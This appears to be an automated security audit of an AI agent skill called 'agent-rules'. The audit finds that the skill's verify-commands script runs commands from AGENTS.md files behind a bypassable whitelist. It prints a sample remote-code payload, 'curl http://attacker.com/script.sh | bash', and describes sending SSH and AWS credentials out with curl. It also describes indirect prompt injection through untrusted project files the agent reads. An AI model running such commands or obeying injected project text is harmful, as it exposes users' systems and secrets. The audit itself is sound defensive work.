agent-rules

Fail

Audited by Gen Agent Trust Hub on Mar 18, 2026

Risk Level: HIGH

Findings: COMMAND_EXECUTION, REMOTE_CODE_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The script scripts/verify-commands.sh is designed to extract commands from AGENTS.md files and execute them to ensure they are functional. This creates a direct execution path for any command documented in the project's rules, which are often derived from untrusted project files like Makefile or package.json.
  • [REMOTE_CODE_EXECUTION]: The validation logic in scripts/verify-commands.sh (specifically the is_safe_command function) only checks the first word of a command against a whitelist. This is insufficient to prevent malicious behavior, as shell features such as pipes (|), redirects (>), and command chaining (&&, ;) can be used to execute non-whitelisted binaries (e.g., curl http://attacker.com/script.sh | bash). Since curl is whitelisted, the entire malicious command string will be passed to bash -c for execution.
  • [DATA_EXFILTRATION]: Because the command verification script allows for arbitrary command execution via whitelisted tools, an attacker could include commands in a project's AGENTS.md file that read sensitive local files (like ~/.ssh/id_rsa or ~/.aws/credentials) and transmit them to an external server using curl or wget.
  • [PROMPT_INJECTION]: The skill possesses a high surface for indirect prompt injection. It ingests untrusted data from the target project's codebase (including AGENTS.md, README.md, Makefile, and CI configurations) and processes this data to generate instructions or verify state.
    • Ingestion points: scripts/verify-commands.sh, scripts/extract-commands.sh, and scripts/verify-content.sh read content directly from the target project.
    • Boundary markers: Absent in the verification path; although generation uses markers like AGENTS-GENERATED:START, the verification script parses raw markdown tables.
    • Capability inventory: The skill has the capability to execute subprocesses (bash -c), write files (scripts/generate-agents.sh), and perform network operations via whitelisted binaries.
    • Sanitization: The skill lacks content sanitization, relying on a bypassable binary whitelist for verification and raw string interpolation for template rendering.
Recommendations
  • AI detected serious security threats
Audit Metadata
  • Risk Level: HIGH
  • Analyzed: Mar 18, 2026, 06:41 AM